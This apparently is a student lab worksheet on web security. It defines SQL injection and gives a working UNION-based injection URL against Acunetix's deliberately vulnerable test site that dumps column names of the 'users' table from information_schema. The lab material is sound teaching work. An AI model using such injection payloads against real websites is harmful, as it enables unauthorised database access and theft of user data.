WMS WS - 3 Ujjawal
WMS WS - 3 Ujjawal
Section/Group: 20BCS_KRG_WM1-B
Acunetix offers specialised technologies that let you detect more and
fix faster.
SQL INJECTIONS:
SQL injection is a code injection technique that might destroy your
database.
SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements,
via web page input.
SQL injection usually occurs when you ask a user for input, like their
username/userid, and instead of a name/id, the user gives you an SQL
statement that you will unknowingly run on your database.
• Go to- http://testphp.vulnweb.com/listproducts.php?cat=1
•
• Column name:
•
http://testphp.vulnweb.com/listproducts.php?cat=-
1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(col
umn_name)%20from%20information_schema.columns%20whe
re%20table_name=0x7573657273